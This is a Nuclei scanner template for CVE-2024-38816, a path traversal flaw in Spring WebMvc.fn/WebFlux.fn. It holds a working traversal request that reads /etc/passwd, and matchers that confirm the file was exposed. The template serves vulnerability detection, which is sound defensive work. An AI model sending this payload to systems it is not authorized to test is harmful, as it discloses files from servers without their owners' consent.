id: CVE-2024-38816

info:
  name: WebMvc.fn/WebFlux.fn - Path Traversal
  author: pussycat0x
  severity: high
  description: |
    Applications serving static resources through the functional web frameworks WebMvc.fn or WebFlux.fn are vulnerable to path traversal attacks. An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible to the process in which the Spring application is running.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-38816
    - https://github.com/masa42/CVE-2024-38816-PoC
    - https://spring.io/security/cve-2024-38816
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-38816
    epss-score: 0.00043
    epss-percentile: 0.09632
  tags: cve,cve2024,spring

http:
  - method: GET
    path:
      - "{{BaseURL}}/static/link/%2e%2e/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: regex
        part: content_type
        regex:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ec33e750e147fb4226ffb401ed80c5372777ad55fb450760bd04e256b2bf7169022100f02b2498bcd8b85fcc54935a765535bbca7a01cbae9b6f5790635e7b2d45fa90:922c64590222798bb761d5b6d8e72950